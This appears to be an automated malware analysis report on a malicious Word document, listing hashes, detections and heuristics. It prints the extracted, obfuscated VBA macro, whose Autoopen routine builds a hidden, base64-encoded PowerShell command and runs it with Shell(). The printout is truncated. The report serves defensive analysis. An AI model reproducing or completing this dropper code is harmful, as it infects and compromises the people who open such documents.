Office (OLE) malware analysis — malicious · a87adcfbb182e173

MALICIOUS

Office (OLE)

78.8 KB Created: 2018-05-29 19:25:00 Authoring application: Microsoft Office Word First seen: 2019-05-10

MD5: 5ab194fe98fbe075c8def97188f62849 SHA-1: d4c955deb03e9961e046f3f39c17615bce2f2965 SHA-256: a87adcfbb182e173f79f795e05ac7c7aebd7dc510ab6994ccb25e3a1daef997f

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1071.001 Web Protocols

The sample is a malicious Office document containing a VBA macro. The Autoopen subroutine triggers the execution of a function that uses the Shell() command with the vbHide parameter. This indicates the macro is designed to execute a command, likely to download and run a second-stage payload, which is a common dropper behavior. The ClamAV detection further supports its malicious nature.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6565287-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6565287-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13985 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	13985 bytes
SHA-256: `e2a94167865bb81480165a341dffec708b6898bbf7d540ce4ed4a7a5ed0642f3`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "lbuEISFI" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function OFiiHhGalz() On Error Resume Next bnSnoX = Atn(81251 * CInt(39112) + 20198 - 16924) HiPQn = 48977 + _ Log(79318) - bnczq / Atn(61657) / Otihzf / vQiVi iAzWhF = Atn(96155 * CInt(94367) + 98336 - 64182) sDhSDz = 76571 + _ Log(54381) - vIwlc / Atn(18053) / wjwiSr / UapGS OFiiHhGalz = ciHfcIZsOY + RGTAkQrKDQ + rbnNSS + MqjijuQrJS + MZAEKi + jTUwr + wpPou + lSwuPBZw iwPMmp = Atn(92244 * CInt(96686) + 85538 - 84183) usbfZ = 8505 + _ Log(23578) - XZBOAw / Atn(57264) / oNsNt / qZwtk End Function Sub Autoopen() On Error Resume Next nNhDrh = Atn(77444 * CInt(49900) + 30534 - 66856) VdMuLj = 66614 + _ Log(29009) - IoHlz / Atn(57556) / YBChj / NFKsw ilMMTl (OFiiHhGalz) SKDlG = Atn(35516 * CInt(44182) + 69966 - 63553) fsPdWq = 98519 + _ Log(12327) - DNKPYN / Atn(2752) / BQGjT / LwCECA End Sub Function ilMMTl(YQTQj) On Error Resume Next ctpzW = Atn(18058 * CInt(33823) + 5336 - 95036) GEwuJ = 14773 + _ Log(90032) - XEEVUa / Atn(84143) / KDhTl / FdbTUS mGvKpZik = EYVInP + Chr(vbKeyP) + pDYhbuLV EjLEs = Atn(537 * CInt(61052) + 44695 - 76357) oIZfw = 27286 + _ Log(14234) - PFKwN / Atn(41077) / lKwTTp / ciTUtR wZdhpbidX = IlhNc + Shell(oCOsLHFr + mGvKpZik + clQiwruait + YQTQj + ACXctrljHnH, vbHide) ZMoXBs = Atn(22281 * CInt(23515) + 32436 - 18335) TuFNq = 10998 + _ Log(42453) - aHphEU / Atn(25145) / juMbU / zptWbM End Function Attribute VB_Name = "SZtoEzuhOnN" Function ciHfcIZsOY() On Error Resume Next JFdFwu = Atn(72680 * CInt(25577) + 14042 - 8708) wupMCu = 90460 + _ Log(73369) - wjpLK / Atn(54285) / MZfjoA / PjzGHE RKRwLmJ = "owersH" + "eLL -" + "WinDowsTy" + "le hi" + "dden -e" + " IAAoACgAKAA" kmrRQb = Atn(10789 * CInt(75098) + 17492 - 88880) DPBZP = 33020 + _ Log(90050) - PZnbU / Atn(5620) / vafFon / YNzwut BFdsBDlbo = "iAHsAMwAzAH0Ae" + "wAxADIAfQB7ADUA" + "OAB9AHsANQAzAH" + "0AewAxADgAf" + "QB7ADcAf" + "QB7ADYAMAB9A" + "HsAMgA" + "4AH0AewA2" ZZQlj = Atn(71628 * CInt(71273) + 96107 - 80208) jLlpE = 94534 + _ Log(20558) - OVjfH / Atn(7398) / MWrnc / WBVpz jcfTBS = "ADgAfQB" + "7ADEANgB9AHsAMw" + "A5AH0Ae" + "wAxAH0" + "AewA0ADIA" + "fQB7ADUAMgB9AHs" + "ANQA2AH0" qlRKz = Atn(70191 * CInt(27539) + 47750 - 56980) rTQmc = 62536 + _ Log(46829) - uSMjW / Atn(28875) / KNBKJP / FZUkw YuMCripYRd = "AewAxADUAf" + "QB7ADYANQ" + "B9AHsAMgA1" + "AH0Aew" jusfb = Atn(19941 * CInt(58899) + 45342 - 43971) npcCuj = 20497 + _ Log(19582) - CQmXN / Atn(28452) / mrOqS / jNjzZh iWfjqLnU = "A0ADUAfQB7ADUAN" + "wB9AHsANAB9AHsA" + "MAB9AHsAN" + "wAyAH0AewAzAH0A" + "ewAyADAAfQB7A" + "DMAOAB9A" + "HsANAA" + "3AH0A" + "ewA3A" + "DAAfQB7ADYA" MkWnX = Atn(26151 * CInt(38788) + 63269 - 25118) YPKWt = 87725 + _ Log(94484) - fQHXn / Atn(17307) / XvFPSv / dFBSu JapTrl = "MgB9AHsAMQAw" + "AH0AewAzA" + "DUAfQB7ADE" + "ANwB9AHs" + "ANQB9AHsANAAz" + "AH0AewAzADAAfQB" + "7ADMANgB9" zzumZl = Atn(81139 * CInt(52663) + 15526 - 41575) UmbtRw = 78761 + _ Log(94424) - HASOR / Atn(89300) / RmEUb / wYjVVw scLQqKZvCW = "AHsAMgAz" + "AH0AewAxADMAf" + "QB7ADEANA" + "B9AHsANAA0AH" + "0AewA2ADEAf" + "QB7ADEAMQB9AHsA" + "NAA5AH" + "0AewA" + "2ADkAf" SEPZP = Atn(90353 * CInt(61466) + 37490 - 26027) JMVhr = 98090 + _ Log(64485) - VfbZpD / Atn(1965) / VoDNv / qvuCls KzIoUbsR = "QB7ADQANgB9AH" + "sAMwAxAH0Aew" + "A2ADMAfQ" + "B7ADgAf" + "QB7ADIAMQB9" + "AHsANgB9AHs" + "AMgA2AH0AewAyA" + "DIAfQB7ADYANgB9" + "AHsANQA" + "wAH0AewA2ADQA" WOqDau = Atn(14952 * CInt(12474) + 32860 - 13637) wpASZ = 87881 + _ Log(30124) - YBZrP / Atn(99916) / iVZno / piwQl AsQpWhfmR = "fQB7ADUAOQ" + "B9AHsANQA1AH0Ae" + "wAyADQ" + "AfQB7ADM" + "AMgB9AH" + "sANwAxAH0Ae" OItHE = Atn(63879 * CInt(58366) + 28679 - 12676) YWAmZT = 93585 + _ Log(94520) - aDKMl / Atn(63669) / SLJHBC / YACftV LOqjm = "wA2AD" + "cAfQB7ADEAOQB" + "9AHsAMwA0A" + "H0AewAyADc" + ... (truncated)

SHA-256: e2a94167865bb81480165a341dffec708b6898bbf7d540ce4ed4a7a5ed0642f3

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "lbuEISFI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function OFiiHhGalz()
On Error Resume Next
bnSnoX = Atn(81251 * CInt(39112) + 20198 - 16924)
HiPQn = 48977 + _
Log(79318) - bnczq / Atn(61657) / Otihzf / vQiVi
iAzWhF = Atn(96155 * CInt(94367) + 98336 - 64182)
sDhSDz = 76571 + _
Log(54381) - vIwlc / Atn(18053) / wjwiSr / UapGS
OFiiHhGalz = ciHfcIZsOY + RGTAkQrKDQ + rbnNSS + MqjijuQrJS + MZAEKi + jTUwr + wpPou + lSwuPBZw
iwPMmp = Atn(92244 * CInt(96686) + 85538 - 84183)
usbfZ = 8505 + _
Log(23578) - XZBOAw / Atn(57264) / oNsNt / qZwtk
End Function
Sub Autoopen()
On Error Resume Next
nNhDrh = Atn(77444 * CInt(49900) + 30534 - 66856)
VdMuLj = 66614 + _
Log(29009) - IoHlz / Atn(57556) / YBChj / NFKsw
ilMMTl (OFiiHhGalz)
SKDlG = Atn(35516 * CInt(44182) + 69966 - 63553)
fsPdWq = 98519 + _
Log(12327) - DNKPYN / Atn(2752) / BQGjT / LwCECA
End Sub
Function ilMMTl(YQTQj)
On Error Resume Next
ctpzW = Atn(18058 * CInt(33823) + 5336 - 95036)
GEwuJ = 14773 + _
Log(90032) - XEEVUa / Atn(84143) / KDhTl / FdbTUS
mGvKpZik = EYVInP + Chr(vbKeyP) + pDYhbuLV
EjLEs = Atn(537 * CInt(61052) + 44695 - 76357)
oIZfw = 27286 + _
Log(14234) - PFKwN / Atn(41077) / lKwTTp / ciTUtR
wZdhpbidX = IlhNc + Shell(oCOsLHFr + mGvKpZik + clQiwruait + YQTQj + ACXctrljHnH, vbHide)
ZMoXBs = Atn(22281 * CInt(23515) + 32436 - 18335)
TuFNq = 10998 + _
Log(42453) - aHphEU / Atn(25145) / juMbU / zptWbM
End Function



Attribute VB_Name = "SZtoEzuhOnN"
Function ciHfcIZsOY()
On Error Resume Next
JFdFwu = Atn(72680 * CInt(25577) + 14042 - 8708)
wupMCu = 90460 + _
Log(73369) - wjpLK / Atn(54285) / MZfjoA / PjzGHE
RKRwLmJ = "owersH" + "eLL -" + "WinDowsTy" + "le hi" + "dden -e" + " IAAoACgAKAA"
kmrRQb = Atn(10789 * CInt(75098) + 17492 - 88880)
DPBZP = 33020 + _
Log(90050) - PZnbU / Atn(5620) / vafFon / YNzwut
BFdsBDlbo = "iAHsAMwAzAH0Ae" + "wAxADIAfQB7ADUA" + "OAB9AHsANQAzAH" + "0AewAxADgAf" + "QB7ADcAf" + "QB7ADYAMAB9A" + "HsAMgA" + "4AH0AewA2"
ZZQlj = Atn(71628 * CInt(71273) + 96107 - 80208)
jLlpE = 94534 + _
Log(20558) - OVjfH / Atn(7398) / MWrnc / WBVpz
jcfTBS = "ADgAfQB" + "7ADEANgB9AHsAMw" + "A5AH0Ae" + "wAxAH0" + "AewA0ADIA" + "fQB7ADUAMgB9AHs" + "ANQA2AH0"
qlRKz = Atn(70191 * CInt(27539) + 47750 - 56980)
rTQmc = 62536 + _
Log(46829) - uSMjW / Atn(28875) / KNBKJP / FZUkw
YuMCripYRd = "AewAxADUAf" + "QB7ADYANQ" + "B9AHsAMgA1" + "AH0Aew"
jusfb = Atn(19941 * CInt(58899) + 45342 - 43971)
npcCuj = 20497 + _
Log(19582) - CQmXN / Atn(28452) / mrOqS / jNjzZh
iWfjqLnU = "A0ADUAfQB7ADUAN" + "wB9AHsANAB9AHsA" + "MAB9AHsAN" + "wAyAH0AewAzAH0A" + "ewAyADAAfQB7A" + "DMAOAB9A" + "HsANAA" + "3AH0A" + "ewA3A" + "DAAfQB7ADYA"
MkWnX = Atn(26151 * CInt(38788) + 63269 - 25118)
YPKWt = 87725 + _
Log(94484) - fQHXn / Atn(17307) / XvFPSv / dFBSu
JapTrl = "MgB9AHsAMQAw" + "AH0AewAzA" + "DUAfQB7ADE" + "ANwB9AHs" + "ANQB9AHsANAAz" + "AH0AewAzADAAfQB" + "7ADMANgB9"
zzumZl = Atn(81139 * CInt(52663) + 15526 - 41575)
UmbtRw = 78761 + _
Log(94424) - HASOR / Atn(89300) / RmEUb / wYjVVw
scLQqKZvCW = "AHsAMgAz" + "AH0AewAxADMAf" + "QB7ADEANA" + "B9AHsANAA0AH" + "0AewA2ADEAf" + "QB7ADEAMQB9AHsA" + "NAA5AH" + "0AewA" + "2ADkAf"
SEPZP = Atn(90353 * CInt(61466) + 37490 - 26027)
JMVhr = 98090 + _
Log(64485) - VfbZpD / Atn(1965) / VoDNv / qvuCls
KzIoUbsR = "QB7ADQANgB9AH" + "sAMwAxAH0Aew" + "A2ADMAfQ" + "B7ADgAf" + "QB7ADIAMQB9" + "AHsANgB9AHs" + "AMgA2AH0AewAyA" + "DIAfQB7ADYANgB9" + "AHsANQA" + "wAH0AewA2ADQA"
WOqDau = Atn(14952 * CInt(12474) + 32860 - 13637)
wpASZ = 87881 + _
Log(30124) - YBZrP / Atn(99916) / iVZno / piwQl
AsQpWhfmR = "fQB7ADUAOQ" + "B9AHsANQA1AH0Ae" + "wAyADQ" + "AfQB7ADM" + "AMgB9AH" + "sANwAxAH0Ae"
OItHE = Atn(63879 * CInt(58366) + 28679 - 12676)
YWAmZT = 93585 + _
Log(94520) - aDKMl / Atn(63669) / SLJHBC / YACftV
LOqjm = "wA2AD" + "cAfQB7ADEAOQB" + "9AHsAMwA0A" + "H0AewAyADc" + 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.